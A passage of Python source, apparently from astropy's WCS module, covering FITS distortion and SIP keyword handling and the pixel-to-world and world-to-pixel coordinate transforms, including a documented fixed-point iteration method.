d_header.get('CRVAL2', 0.0))
d_cdelt = (d_header.get('CDELT1', 1.0),
d_header.get('CDELT2', 1.0))
d_lookup = DistortionLookupTable(d_data, d_crpix, d_crval, d_cdelt)
tables[i] = d_lookup
for key in set(header):
if key.startswith(dp + '.'):
del header[key]
else:
warnings.warn('Polynomial distortion is not implemented.\n', AstropyUserWarning)
else:
tables[i] = None
if not tables:
return (None, None)
else:
return (tables.get(1), tables.get(2))
def _write_distortion_kw(self, hdulist, dist='CPDIS'):
"""
Write out `distortion paper`_ keywords to the given
`fits.HDUList`.
"""
if self.cpdis1 is None and self.cpdis2 is None:
return
if dist == 'CPDIS':
d_kw = 'DP'
err_kw = 'CPERR'
else:
d_kw = 'DQ'
err_kw = 'CQERR'
def write_dist(num, cpdis):
if cpdis is None:
return
hdulist[0].header[f'{dist}{num:d}'] = (
'LOOKUP', 'Prior distortion function type')
hdulist[0].header[f'{d_kw}{num:d}.EXTVER'] = (
num, 'Version number of WCSDVARR extension')
hdulist[0].header[f'{d_kw}{num:d}.NAXES'] = (
len(cpdis.data.shape), f'Number of independent variables in {dist} function')
for i in range(cpdis.data.ndim):
jth = {1: '1st', 2: '2nd', 3: '3rd'}.get(i + 1, f'{i + 1}th')
hdulist[0].header['{}{:d}.AXIS.{:d}'.format(d_kw, num, i + 1)] = (
i + 1,
f'Axis number of the {jth} variable in a {dist} function')
image = fits.ImageHDU(cpdis.data, name='WCSDVARR')
header = image.header
header['CRPIX1'] = (cpdis.crpix[0], 'Coordinate system reference pixel')
header['CRPIX2'] = (cpdis.crpix[1], 'Coordinate system reference pixel')
header['CRVAL1'] = (cpdis.crval[0], 'Coordinate system value at reference pixel')
header['CRVAL2'] = (cpdis.crval[1], 'Coordinate system value at reference pixel')
header['CDELT1'] = (cpdis.cdelt[0], 'Coordinate increment along axis')
header['CDELT2'] = (cpdis.cdelt[1], 'Coordinate increment along axis')
image.ver = int(hdulist[0].header[f'{d_kw}{num:d}.EXTVER'])
hdulist.append(image)
write_dist(1, self.cpdis1)
write_dist(2, self.cpdis2)
def _remove_sip_kw(self, header):
"""
Remove SIP information from a header.
"""
# Never pass SIP coefficients to wcslib
# CTYPE must be passed with -SIP to wcslib
for key in set(m.group() for m in map(SIP_KW.match, list(header))
if m is not None):
del header[key]
def _read_sip_kw(self, header, wcskey=""):
"""
Reads `SIP`_ header keywords and returns a `~astropy.wcs.Sip`
object.
If no `SIP`_ header keywords are found, ``None`` is returned.
"""
if isinstance(header, (str, bytes)):
# TODO: Parse SIP from a string without pyfits around
return None
if "A_ORDER" in header and header['A_ORDER'] > 1:
if "B_ORDER" not in header:
raise ValueError(
"A_ORDER provided without corresponding B_ORDER "
"keyword for SIP distortion")
m = int(header["A_ORDER"])
a = np.zeros((m + 1, m + 1), np.double)
for i in range(m + 1):
for j in range(m - i + 1):
key = f"A_{i}_{j}"
if key in header:
a[i, j] = header[key]
del header[key]
m = int(header["B_ORDER"])
if m > 1:
b = np.zeros((m + 1, m + 1), np.double)
for i in range(m + 1):
for j in range(m - i + 1):
key = f"B_{i}_{j}"
if key in header:
b[i, j] = header[key]
del header[key]
else:
a = None
b = None
del header['A_ORDER']
del header['B_ORDER']
ctype = [header[f'CTYPE{nax}{wcskey}'] for nax in range(1, self.naxis + 1)]
if any(not ctyp.endswith('-SIP') for ctyp in ctype):
message = """
Inconsistent SIP distortion information is present in the FITS header and the WCS object:
SIP coefficients were detected, but CTYPE is missing a "-SIP" suffix.
astropy.wcs is using the SIP distortion coefficients,
therefore the coordinates calculated here might be incorrect.
If you do not want to apply the SIP distortion coefficients,
please remove the SIP coefficients from the FITS header or the
WCS object. As an example, if the image is already distortion-corrected
(e.g., drizzled) then distortion components should not apply and the SIP
coefficients should be removed.
While the SIP distortion coefficients are being applied here, if that was indeed the intent,
for consistency please append "-SIP" to the CTYPE in the FITS header or the WCS object.
"""
log.info(message)
elif "B_ORDER" in header and header['B_ORDER'] > 1:
raise ValueError(
"B_ORDER provided without corresponding A_ORDER " +
"keyword for SIP distortion")
else:
a = None
b = None
if "AP_ORDER" in header and header['AP_ORDER'] > 1:
if "BP_ORDER" not in header:
raise ValueError(
"AP_ORDER provided without corresponding BP_ORDER "
"keyword for SIP distortion")
m = int(header["AP_ORDER"])
ap = np.zeros((m + 1, m + 1), np.double)
for i in range(m + 1):
for j in range(m - i + 1):
key = f"AP_{i}_{j}"
if key in header:
ap[i, j] = header[key]
del header[key]
m = int(header["BP_ORDER"])
if m > 1:
bp = np.zeros((m + 1, m + 1), np.double)
for i in range(m + 1):
for j in range(m - i + 1):
key = f"BP_{i}_{j}"
if key in header:
bp[i, j] = header[key]
del header[key]
else:
ap = None
bp = None
del header['AP_ORDER']
del header['BP_ORDER']
elif "BP_ORDER" in header and header['BP_ORDER'] > 1:
raise ValueError(
"BP_ORDER provided without corresponding AP_ORDER "
"keyword for SIP distortion")
else:
ap = None
bp = None
if a is None and b is None and ap is None and bp is None:
return None
if f"CRPIX1{wcskey}" not in header or f"CRPIX2{wcskey}" not in header:
raise ValueError(
"Header has SIP keywords without CRPIX keywords")
crpix1 = header.get(f"CRPIX1{wcskey}")
crpix2 = header.get(f"CRPIX2{wcskey}")
return Sip(a, b, ap, bp, (crpix1, crpix2))
def _write_sip_kw(self):
"""
Write out SIP keywords. Returns a dictionary of key-value
pairs.
"""
if self.sip is None:
return {}
keywords = {}
def write_array(name, a):
if a is None:
return
size = a.shape[0]
trdir = 'sky to detector' if name[-1] == 'P' else 'detector to sky'
comment = ('SIP polynomial order, axis {:d}, {:s}'
.format(ord(name[0]) - ord('A'), trdir))
keywords[f'{name}_ORDER'] = size - 1, comment
comment = 'SIP distortion coefficient'
for i in range(size):
for j in range(size - i):
if a[i, j] != 0.0:
keywords[
f'{name}_{i:d}_{j:d}'] = a[i, j], comment
write_array('A', self.sip.a)
write_array('B', self.sip.b)
write_array('AP', self.sip.ap)
write_array('BP', self.sip.bp)
return keywords
def _denormalize_sky(self, sky):
if self.wcs.lngtyp != 'RA':
raise ValueError(
"WCS does not have longitude type of 'RA', therefore " +
"(ra, dec) data can not be used as input")
if self.wcs.lattyp != 'DEC':
raise ValueError(
"WCS does not have longitude type of 'DEC', therefore " +
"(ra, dec) data can not be used as input")
if self.wcs.naxis == 2:
if self.wcs.lng == 0 and self.wcs.lat == 1:
return sky
elif self.wcs.lng == 1 and self.wcs.lat == 0:
# Reverse the order of the columns
return sky[:, ::-1]
else:
raise ValueError(
"WCS does not have longitude and latitude celestial " +
"axes, therefore (ra, dec) data can not be used as input")
else:
if self.wcs.lng < 0 or self.wcs.lat < 0:
raise ValueError(
"WCS does not have both longitude and latitude "
"celestial axes, therefore (ra, dec) data can not be " +
"used as input")
out = np.zeros((sky.shape[0], self.wcs.naxis))
out[:, self.wcs.lng] = sky[:, 0]
out[:, self.wcs.lat] = sky[:, 1]
return out
def _normalize_sky(self, sky):
if self.wcs.lngtyp != 'RA':
raise ValueError(
"WCS does not have longitude type of 'RA', therefore " +
"(ra, dec) data can not be returned")
if self.wcs.lattyp != 'DEC':
raise ValueError(
"WCS does not have longitude type of 'DEC', therefore " +
"(ra, dec) data can not be returned")
if self.wcs.naxis == 2:
if self.wcs.lng == 0 and self.wcs.lat == 1:
return sky
elif self.wcs.lng == 1 and self.wcs.lat == 0:
# Reverse the order of the columns
return sky[:, ::-1]
else:
raise ValueError(
"WCS does not have longitude and latitude celestial "
"axes, therefore (ra, dec) data can not be returned")
else:
if self.wcs.lng < 0 or self.wcs.lat < 0:
raise ValueError(
"WCS does not have both longitude and latitude celestial "
"axes, therefore (ra, dec) data can not be returned")
out = np.empty((sky.shape[0], 2))
out[:, 0] = sky[:, self.wcs.lng]
out[:, 1] = sky[:, self.wcs.lat]
return out
def _array_converter(self, func, sky, *args, ra_dec_order=False):
"""
A helper function to support reading either a pair of arrays
or a single Nx2 array.
"""
def _return_list_of_arrays(axes, origin):
if any([x.size == 0 for x in axes]):
return axes
try:
axes = np.broadcast_arrays(*axes)
except ValueError:
raise ValueError(
"Coordinate arrays are not broadcastable to each other")
xy = np.hstack([x.reshape((x.size, 1)) for x in axes])
if ra_dec_order and sky == 'input':
xy = self._denormalize_sky(xy)
output = func(xy, origin)
if ra_dec_order and sky == 'output':
output = self._normalize_sky(output)
return (output[:, 0].reshape(axes[0].shape),
output[:, 1].reshape(axes[0].shape))
return [output[:, i].reshape(axes[0].shape)
for i in range(output.shape[1])]
def _return_single_array(xy, origin):
if xy.shape[-1] != self.naxis:
raise ValueError(
"When providing two arguments, the array must be "
"of shape (N, {})".format(self.naxis))
if 0 in xy.shape:
return xy
if ra_dec_order and sky == 'input':
xy = self._denormalize_sky(xy)
result = func(xy, origin)
if ra_dec_order and sky == 'output':
result = self._normalize_sky(result)
return result
if len(args) == 2:
try:
xy, origin = args
xy = np.asarray(xy)
origin = int(origin)
except Exception:
raise TypeError(
"When providing two arguments, they must be "
"(coords[N][{}], origin)".format(self.naxis))
if xy.shape == () or len(xy.shape) == 1:
return _return_list_of_arrays([xy], origin)
return _return_single_array(xy, origin)
elif len(args) == self.naxis + 1:
axes = args[:-1]
origin = args[-1]
try:
axes = [np.asarray(x) for x in axes]
origin = int(origin)
except Exception:
raise TypeError(
"When providing more than two arguments, they must be " +
"a 1-D array for each axis, followed by an origin.")
return _return_list_of_arrays(axes, origin)
raise TypeError(
"WCS projection has {0} dimensions, so expected 2 (an Nx{0} array "
"and the origin argument) or {1} arguments (the position in each "
"dimension, and the origin argument). Instead, {2} arguments were "
"given.".format(
self.naxis, self.naxis + 1, len(args)))
def all_pix2world(self, *args, **kwargs):
return self._array_converter(
self._all_pix2world, 'output', *args, **kwargs)
all_pix2world.__doc__ = """
Transforms pixel coordinates to world coordinates.
Performs all of the following in series:
- Detector to image plane correction (if present in the
FITS file)
- `SIP`_ distortion correction (if present in the FITS
file)
- `distortion paper`_ table-lookup correction (if present
in the FITS file)
- `wcslib`_ "core" WCS transformation
Parameters
----------
{}
For a transformation that is not two-dimensional, the
two-argument form must be used.
{}
Returns
-------
{}
Notes
-----
The order of the axes for the result is determined by the
``CTYPEia`` keywords in the FITS header, therefore it may not
always be of the form (*ra*, *dec*). The
`~astropy.wcs.Wcsprm.lat`, `~astropy.wcs.Wcsprm.lng`,
`~astropy.wcs.Wcsprm.lattyp` and `~astropy.wcs.Wcsprm.lngtyp`
members can be used to determine the order of the axes.
Raises
------
MemoryError
Memory allocation failed.
SingularMatrixError
Linear transformation matrix is singular.
InconsistentAxisTypesError
Inconsistent or unrecognized coordinate axis types.
ValueError
Invalid parameter value.
ValueError
Invalid coordinate transformation parameters.
ValueError
x- and y-coordinate arrays are not the same size.
InvalidTransformError
Invalid coordinate transformation parameters.
InvalidTransformError
Ill-conditioned coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('naxis', 8),
docstrings.RA_DEC_ORDER(8),
docstrings.RETURNS('sky coordinates, in degrees', 8))
def wcs_pix2world(self, *args, **kwargs):
if self.wcs is None:
raise ValueError("No basic WCS settings were created.")
return self._array_converter(
lambda xy, o: self.wcs.p2s(xy, o)['world'],
'output', *args, **kwargs)
wcs_pix2world.__doc__ = """
Transforms pixel coordinates to world coordinates by doing
only the basic `wcslib`_ transformation.
No `SIP`_ or `distortion paper`_ table lookup correction is
applied. To perform distortion correction, see
`~astropy.wcs.WCS.all_pix2world`,
`~astropy.wcs.WCS.sip_pix2foc`, `~astropy.wcs.WCS.p4_pix2foc`,
or `~astropy.wcs.WCS.pix2foc`.
Parameters
----------
{}
For a transformation that is not two-dimensional, the
two-argument form must be used.
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
SingularMatrixError
Linear transformation matrix is singular.
InconsistentAxisTypesError
Inconsistent or unrecognized coordinate axis types.
ValueError
Invalid parameter value.
ValueError
Invalid coordinate transformation parameters.
ValueError
x- and y-coordinate arrays are not the same size.
InvalidTransformError
Invalid coordinate transformation parameters.
InvalidTransformError
Ill-conditioned coordinate transformation parameters.
Notes
-----
The order of the axes for the result is determined by the
``CTYPEia`` keywords in the FITS header, therefore it may not
always be of the form (*ra*, *dec*). The
`~astropy.wcs.Wcsprm.lat`, `~astropy.wcs.Wcsprm.lng`,
`~astropy.wcs.Wcsprm.lattyp` and `~astropy.wcs.Wcsprm.lngtyp`
members can be used to determine the order of the axes.
""".format(docstrings.TWO_OR_MORE_ARGS('naxis', 8),
docstrings.RA_DEC_ORDER(8),
docstrings.RETURNS('world coordinates, in degrees', 8))
def _all_world2pix(self, world, origin, tolerance, maxiter, adaptive,
detect_divergence, quiet):
# ############################################################
# # DESCRIPTION OF THE NUMERICAL METHOD ##
# ############################################################
# In this section I will outline the method of solving
# the inverse problem of converting world coordinates to
# pixel coordinates (*inverse* of the direct transformation
# `all_pix2world`) and I will summarize some of the aspects
# of the method proposed here and some of the issues of the
# original `all_world2pix` (in relation to this method)
# discussed in https://github.com/astropy/astropy/issues/1977
# A more detailed discussion can be found here:
# https://github.com/astropy/astropy/pull/2373
#
#
# ### Background ###
#
#
# I will refer here to the [SIP Paper]
# (http://fits.gsfc.nasa.gov/registry/sip/SIP_distortion_v1_0.pdf).
# According to this paper, the effect of distortions as
# described in *their* equation (1) is:
#
# (1) x = CD*(u+f(u)),
#
# where `x` is a *vector* of "intermediate spherical
# coordinates" (equivalent to (x,y) in the paper) and `u`
# is a *vector* of "pixel coordinates", and `f` is a vector
# function describing geometrical distortions
# (see equations 2 and 3 in SIP Paper.
# However, I prefer to use `w` for "intermediate world
# coordinates", `x` for pixel coordinates, and assume that
# transformation `W` performs the **linear**
# (CD matrix + projection onto celestial sphere) part of the
# conversion from pixel coordinates to world coordinates.
# Then we can re-write (1) as:
#
# (2) w = W*(x+f(x)) = T(x)
#
# In `astropy.wcs.WCS` transformation `W` is represented by
# the `wcs_pix2world` member, while the combined ("total")
# transformation (linear part + distortions) is performed by
# `all_pix2world`. Below I summarize the notations and their
# equivalents in `astropy.wcs.WCS`:
#
# | Equation term | astropy.WCS/meaning |
# | ------------- | ---------------------------- |
# | `x` | pixel coordinates |
# | `w` | world coordinates |
# | `W` | `wcs_pix2world()` |
# | `W^{-1}` | `wcs_world2pix()` |
# | `T` | `all_pix2world()` |
# | `x+f(x)` | `pix2foc()` |
#
#
# ### Direct Solving of Equation (2) ###
#
#
# In order to find the pixel coordinates that correspond to
# given world coordinates `w`, it is necessary to invert
# equation (2): `x=T^{-1}(w)`, or solve equation `w==T(x)`
# for `x`. However, this approach has the following
# disadvantages:
# 1. It requires unnecessary transformations (see next
# section).
# 2. It is prone to "RA wrapping" issues as described in
# https://github.com/astropy/astropy/issues/1977
# (essentially because `all_pix2world` may return points with
# a different phase than the user's input `w`).
#
#
# ### Description of the Method Used here ###
#
#
# By applying inverse linear WCS transformation (`W^{-1}`)
# to both sides of equation (2) and introducing notation `x'`
# (prime) for the pixels coordinates obtained from the world
# coordinates by applying inverse *linear* WCS transformation
# ("focal plane coordinates"):
#
# (3) x' = W^{-1}(w)
#
# we obtain the following equation:
#
# (4) x' = x+f(x),
#
# or,
#
# (5) x = x'-f(x)
#
# This equation is well suited for solving using the method
# of fixed-point iterations
# (http://en.wikipedia.org/wiki/Fixed-point_iteration):
#
# (6) x_{i+1} = x'-f(x_i)
#
# As an initial value of the pixel coordinate `x_0` we take
# "focal plane coordinate" `x'=W^{-1}(w)=wcs_world2pix(w)`.
# We stop iterations when `|x_{i+1}-x_i|<tolerance`. We also
# consider the process to be diverging if
# `|x_{i+1}-x_i|>|x_i-x_{i-1}|`
# **when** `|x_{i+1}-x_i|>=tolerance` (when current
# approximation is close to the true solution,
# `|x_{i+1}-x_i|>|x_i-x_{i-1}|` may be due to rounding errors
# and we ignore such "divergences" when
# `|x_{i+1}-x_i|<tolerance`). It may appear that checking for
# `|x_{i+1}-x_i|<tolerance` in order to ignore divergence is
# unnecessary since the iterative process should stop anyway,
# however, the proposed implementation of this iterative
# process is completely vectorized and, therefore, we may
# continue iterating over *some* points even though they have
# converged to within a specified tolerance (while iterating
# over other points that have not yet converged to
# a solution).
#
# In order to efficiently implement iterative process (6)
# using available methods in `astropy.wcs.WCS`, we add and
# subtract `x_i` from the right side of equation (6):
#
# (7) x_{i+1} = x'-(x_i+f(x_i))+x_i = x'-pix2foc(x_i)+x_i,
#
# where `x'=wcs_world2pix(w)` and it is computed only *once*
# before the beginning of the iterative process (and we also
# set `x_0=x'`). By using `pix2foc` at each iteration instead
# of `all_pix2world` we get about 25% increase in performance
# (by not performing the linear `W` transformation at each
# step) and we also avoid the "RA wrapping" issue described
# above (by working in focal plane coordinates and avoiding
# pix->world transformations).
#
# As an added benefit, the process converges to the correct
# solution in just one iteration when distortions are not
# present (compare to
# https://github.com/astropy/astropy/issues/1977 and
# https://github.com/astropy/astropy/pull/2294): in this case
# `pix2foc` is the identity transformation
# `x_i=pix2foc(x_i)` and from equation (7) we get:
#
# x' = x_0 = wcs_world2pix(w)
# x_1 = x' - pix2foc(x_0) + x_0 = x' - pix2foc(x') + x' = x'
# = wcs_world2pix(w) = x_0
# =>
# |x_1-x_0| = 0 < tolerance (with tolerance > 0)
#
# However, for performance reasons, it is still better to
# avoid iterations altogether and return the exact linear
# solution (`wcs_world2pix`) right-away when non-linear
# distortions are not present by checking that attributes
# `sip`, `cpdis1`, `cpdis2`, `det2im1`, and `det2im2` are
# *all* `None`.
#
#
# ### Outline of the Algorithm ###
#
#
# While the proposed code is relatively long (considering
# the simplicity of the algorithm), this is due to: 1)
# checking if iterative solution is necessary at all; 2)
# checking for divergence; 3) re-implementation of the
# completely vectorized algorithm as an "adaptive" vectorized
# algorithm (for cases when some points diverge for which we
# want to stop iterations). In my tests, the adaptive version
# of the algorithm is about 50% slower than non-adaptive
# version for all HST images.
#
# The essential part of the vectorized non-adaptive algorithm
# (without divergence and other checks) can be described
# as follows:
#
# pix0 = self.wcs_world2pix(world, origin)
# pix = pix0.copy() # 0-order solution
#
# for k in range(maxiter):
# # find correction to the previous solution:
# dpix = self.pix2foc(pix, origin) - pix0
#
# # compute norm (L2) of the correction:
# dn = np.linalg.norm(dpix, axis=1)
#
# # apply correction:
# pix -= dpix
#
# # check convergence:
# if np.max(dn) < tolerance:
# break
#
# return pix
#
# Here, the input parameter `world` can be a `MxN` array
# where `M` is the number of coordinate axes in WCS and `N`
# is the number of points to be converted simultaneously to
# image coordinates.
#
#
# ### IMPORTANT NOTE: ###
#
# If, in the future releases of the `~astropy.wcs`,
# `pix2foc` will not apply all the required distortion
# corrections then in the code below, calls to `pix2foc` will
# have to be replaced with
# wcs_world2pix(all_pix2world(pix_list, origin), origin)
#
# ############################################################
# # INITIALIZE ITERATIVE PROCESS: ##
# ############################################################
# initial approximation (linear WCS based only)
pix0 = self.wcs_world2pix(world, origin)
# Check that an iterative solution is required at all
# (when any of the non-CD-matrix-based corrections are
# present). If not required return the initial
# approximation (pix0).
if not self.has_distortion:
# No non-WCS corrections detected so
# simply return initial approximation:
return pix0
pix = pix0.copy() # 0-order solution
# initial correction:
dpix = self.pix2foc(pix, origin) - pix0
# Update initial solution:
pix -= dpix
# Norm (L2) squared of the correction:
dn = np.sum(dpix*dpix, axis=1)
dnprev = dn.copy() # if adaptive else dn
tol2 = tolerance**2
# Prepare for iterative process
k = 1
ind = None
inddiv = None
# Turn off numpy runtime warnings for 'invalid' and 'over':
old_invalid = np.geterr()['invalid']
old_over = np.geterr()['over']
np.seterr(invalid='ignore', over='ignore')
# ############################################################
# # NON-ADAPTIVE ITERATIONS: ##
# ############################################################
if not adaptive:
# Fixed-point iterations:
while (np.nanmax(dn) >= tol2 and k < maxiter):
# Find correction to the previous solution:
dpix = self.pix2foc(pix, origin) - pix0
# Compute norm (L2) squared of the correction:
dn = np.sum(dpix*dpix, axis=1)
# Check for divergence (we do this in two stages
# to optimize performance for the most common
# scenario when successive approximations converge):
if detect_divergence:
divergent = (dn >= dnprev)
if np.any(divergent):
# Find solutions that have not yet converged:
slowconv = (dn >= tol2)
inddiv, = np.where(divergent & slowconv)
if inddiv.shape[0] > 0:
# Update indices of elements that
# still need correction:
conv = (dn < dnprev)
iconv = np.where(conv)
# Apply correction:
dpixgood = dpix[iconv]
pix[iconv] -= dpixgood
dpix[iconv] = dpixgood
# For the next iteration choose
# non-divergent points that have not yet
# converged to the requested accuracy:
ind, = np.where(slowconv & conv)
pix0 = pix0[ind]
dnprev[ind] = dn[ind]
k += 1
# Switch to adaptive iterations:
adaptive = True
break
# Save current correction magnitudes for later:
dnprev = dn
# Apply correction:
pix -= dpix
k += 1
# ############################################################
# # ADAPTIVE ITERATIONS: ##
# ############################################################
if adaptive:
if ind is None:
ind, = np.where(np.isfinite(pix).all(axis=1))
pix0 = pix0[ind]
# "Adaptive" fixed-point iterations:
while (ind.shape[0] > 0 and k < maxiter):
# Find correction to the previous solution:
dpixnew = self.pix2foc(pix[ind], origin) - pix0
# Compute norm (L2) of the correction:
dnnew = np.sum(np.square(dpixnew), axis=1)
# Bookkeeping of corrections:
dnprev[ind] = dn[ind].copy()
dn[ind] = dnnew
if detect_divergence:
# Find indices of pixels that are converging:
conv = (dnnew < dnprev[ind])
iconv = np.where(conv)
iiconv = ind[iconv]
# Apply correction:
dpixgood = dpixnew[iconv]
pix[iiconv] -= dpixgood
dpix[iiconv] = dpixgood
# Find indices of solutions that have not yet
# converged to the requested accuracy
# AND that do not diverge:
subind, = np.where((dnnew >= tol2) & conv)
else:
# Apply correction:
pix[ind] -= dpixnew
dpix[ind] = dpixnew
# Find indices of solutions that have not yet
# converged to the requested accuracy:
subind, = np.where(dnnew >= tol2)
# Choose solutions that need more iterations:
ind = ind[subind]
pix0 = pix0[subind]
k += 1
# ############################################################
# # FINAL DETECTION OF INVALID, DIVERGING, ##
# # AND FAILED-TO-CONVERGE POINTS ##
# ############################################################
# Identify diverging and/or invalid points:
invalid = ((~np.all(np.isfinite(pix), axis=1)) &
(np.all(np.isfinite(world), axis=1)))
# When detect_divergence==False, dnprev is outdated
# (it is the norm of the very first correction).
# Still better than nothing...
inddiv, = np.where(((dn >= tol2) & (dn >= dnprev)) | invalid)
if inddiv.shape[0] == 0:
inddiv = None
# Identify points that did not converge within 'maxiter'
# iterations:
if k >= maxiter:
ind, = np.where((dn >= tol2) & (dn < dnprev) & (~invalid))
if ind.shape[0] == 0:
ind = None
else:
ind = None
# Restore previous numpy error settings:
np.seterr(invalid=old_invalid, over=old_over)
# ############################################################
# # RAISE EXCEPTION IF DIVERGING OR TOO SLOWLY CONVERGING ##
# # DATA POINTS HAVE BEEN DETECTED: ##
# ############################################################
if (ind is not None or inddiv is not None) and not quiet:
if inddiv is None:
raise NoConvergence(
"'WCS.all_world2pix' failed to "
"converge to the requested accuracy after {:d} "
"iterations.".format(k), best_solution=pix,
accuracy=np.abs(dpix), niter=k,
slow_conv=ind, divergent=None)
else:
raise NoConvergence(
"'WCS.all_world2pix' failed to "
"converge to the requested accuracy.\n"
"After {:d} iterations, the solution is diverging "
"at least for one input point."
.format(k), best_solution=pix,
accuracy=np.abs(dpix), niter=k,
slow_conv=ind, divergent=inddiv)
return pix
def all_world2pix(self, *args, tolerance=1e-4, maxiter=20, adaptive=False,
detect_divergence=True, quiet=False, **kwargs):
if self.wcs is None:
raise ValueError("No basic WCS settings were created.")
return self._array_converter(
lambda *args, **kwargs:
self._all_world2pix(
*args, tolerance=tolerance, maxiter=maxiter,
adaptive=adaptive, detect_divergence=detect_divergence,
quiet=quiet),
'input', *args, **kwargs
)
all_world2pix.__doc__ = """
all_world2pix(*args, tolerance=1.0e-4, maxiter=20,
adaptive=False, detect_divergence=True, quiet=False)
Transforms world coordinates to pixel coordinates, using
numerical iteration to invert the full forward transformation
`~astropy.wcs.WCS.all_pix2world` with complete
distortion model.
Parameters
----------
{0}
For a transformation that is not two-dimensional, the
two-argument form must be used.
{1}
tolerance : float, optional (Default = 1.0e-4)
Tolerance of solution. Iteration terminates when the
iterative solver estimates that the "true solution" is
within this many pixels of the current estimate; more
specifically, when the correction to the solution found
during the previous iteration is smaller
(in the sense of the L2 norm) than ``tolerance``.
maxiter : int, optional (Default = 20)
Maximum number of iterations allowed to reach a solution.
quiet : bool, optional (Default = False)
Do not throw :py:class:`NoConvergence` exceptions when
the method does not converge to a solution with the
required accuracy within a specified number of maximum
iterations set by ``maxiter`` parameter. Instead,
simply return the found solution.
Other Parameters
----------------
adaptive : bool, optional (Default = False)
Specifies whether to adaptively select only points that
did not converge to a solution within the required
accuracy for the next iteration. Default is recommended
for HST as well as most other instruments.
.. note::
The :py:meth:`all_world2pix` uses a vectorized
implementation of the method of consecutive
approximations (see ``Notes`` section below) in which it
keeps iterating over *all* input points, regardless of
individual convergence, until the required accuracy has
been reached for *all* input
points. In some cases it may be possible that
*almost all* points have reached the required accuracy
but only a few input data points remain for
which additional iterations may be needed (this
depends mostly on the characteristics of the geometric
distortions for a given instrument). In this situation
it may be advantageous to set ``adaptive`` = `True` in
which case :py:meth:`all_world2pix` will continue
iterating *only* over the points that have not yet
converged to the required accuracy. However, for the
HST's ACS/WFC detector, which has the strongest
distortions of all HST instruments, testing has
shown that enabling this option would lead to about a
50-100% penalty in computational time (depending on
specifics of the image, geometric distortions, and
number of input points to be converted). Therefore,
for HST and possibly other instruments, it is recommended
to set ``adaptive`` = `False`. The only danger in
getting this setting wrong will be a performance
penalty.
.. note::
When ``detect_divergence`` is `True`,
:py:meth:`all_world2pix` will automatically switch
to the adaptive algorithm once divergence has been
detected.
detect_divergence : bool, optional (Default = True)
Specifies whether to perform a more detailed analysis
of the convergence to a solution. Normally
:py:meth:`all_world2pix` may not achieve the required
accuracy if either the ``tolerance`` or ``maxiter`` arguments
are too low. However, it may happen that for some
geometric distortions the conditions of convergence for
the method of consecutive approximations used by
:py:meth:`all_world2pix` may not be satisfied, in which
case consecutive approximations to the solution will
diverge regardless of the ``tolerance`` or ``maxiter``
settings.
When ``detect_divergence`` is `False`, these divergent
points will be detected as not having achieved the
required accuracy (without further details). In addition,
if ``adaptive`` is `False` then the algorithm will not
know that the solution (for specific points) is diverging
and will continue iterating and trying to "improve"
diverging solutions. This may result in ``NaN`` or
``Inf`` values in the return results (in addition to a
performance penalty). Even when ``detect_divergence``
is `False`, :py:meth:`all_world2pix`, at the end of the
iterative process, will identify invalid results
(``NaN`` or ``Inf``) as "diverging" solutions and will
raise :py:class:`NoConvergence` unless the ``quiet``
parameter is set to `True`.
When ``detect_divergence`` is `True`,
:py:meth:`all_world2pix` will detect points for which
current correction to the coordinates is larger than
the correction applied during the previous iteration
**if** the requested accuracy **has not yet been
achieved**. In this case, if ``adaptive`` is `True`,
these points will be excluded from further iterations and
if ``adaptive`` is `False`, :py:meth:`all_world2pix` will
automatically switch to the adaptive algorithm. Thus, the
reported divergent solution will be the latest converging
solution computed immediately *before* divergence
has been detected.
.. note::
When accuracy has been achieved, small increases in
current corrections may be possible due to rounding
errors (when ``adaptive`` is `False`) and such
increases will be ignored.
.. note::
Based on our testing using HST ACS/WFC images, setting
``detect_divergence`` to `True` will incur about a 5-20%
performance penalty, with the larger penalty
corresponding to ``adaptive`` set to `True`.
Because the benefits of enabling this
feature outweigh the small performance penalty,
especially when ``adaptive`` = `False`, it is
recommended to set ``detect_divergence`` to `True`,
unless extensive testing of the distortion models for
images from specific instruments show a good stability
of the numerical method for a wide range of
coordinates (even outside the image itself).
.. note::
Indices of the diverging inverse solutions will be
reported in the ``divergent`` attribute of the
raised :py:class:`NoConvergence` exception object.
Returns
-------
{2}
Notes
-----
The order of the axes for the input world array is determined by
the ``CTYPEia`` keywords in the FITS header, therefore it may
not always be of the form (*ra*, *dec*). The
`~astropy.wcs.Wcsprm.lat`, `~astropy.wcs.Wcsprm.lng`,
`~astropy.wcs.Wcsprm.lattyp`, and
`~astropy.wcs.Wcsprm.lngtyp`
members can be used to determine the order of the axes.
Using the method of fixed-point iterations, we
iterate starting with the initial approximation, which is
computed using the non-distortion-aware
:py:meth:`wcs_world2pix` (or equivalent).
The :py:meth:`all_world2pix` function uses a vectorized
implementation of the method of consecutive approximations and
therefore it is highly efficient (>30x) when *all* data points
that need to be converted from sky coordinates to image
coordinates are passed at *once*. Therefore, it is advisable,
whenever possible, to pass as input a long array of all points
that need to be converted to :py:meth:`all_world2pix` instead
of calling :py:meth:`all_world2pix` for each data point. Also
see the note to the ``adaptive`` parameter.
Raises
------
NoConvergence
The method did not converge to a
solution to the required accuracy within a specified
number of maximum iterations set by the ``maxiter``
parameter. To turn off this exception, set ``quiet`` to
`True`. Indices of the points for which the requested
accuracy was not achieved (if any) will be listed in the
``slow_conv`` attribute of the
raised :py:class:`NoConvergence` exception object.
See :py:class:`NoConvergence` documentation for
more details.
MemoryError
Memory allocation failed.
SingularMatrixError
Linear transformation matrix is singular.
InconsistentAxisTypesError
Inconsistent or unrecognized coordinate axis types.
ValueError
Invalid parameter value.
ValueError
Invalid coordinate transformation parameters.
ValueError
x- and y-coordinate arrays are not the same size.
InvalidTransformError
Invalid coordinate transformation parameters.
InvalidTransformError
Ill-conditioned coordinate transformation parameters.
Examples
--------
>>> import astropy.io.fits as fits
>>> import astropy.wcs as wcs
>>> import numpy as np
>>> import os
>>> filename = os.path.join(wcs.__path__[0], 'tests/data/j94f05bgq_flt.fits')
>>> hdulist = fits.open(filename)
>>> w = wcs.WCS(hdulist[('sci',1)].header, hdulist)
>>> hdulist.close()
>>> ra, dec = w.all_pix2world([1,2,3], [1,1,1], 1)
>>> print(ra) # doctest: +FLOAT_CMP
[ 5.52645627 5.52649663 5.52653698]
>>> print(dec) # doctest: +FLOAT_CMP
[-72.05171757 -72.05171276 -72.05170795]
>>> radec = w.all_pix2world([[1,1], [2,1], [3,1]], 1)
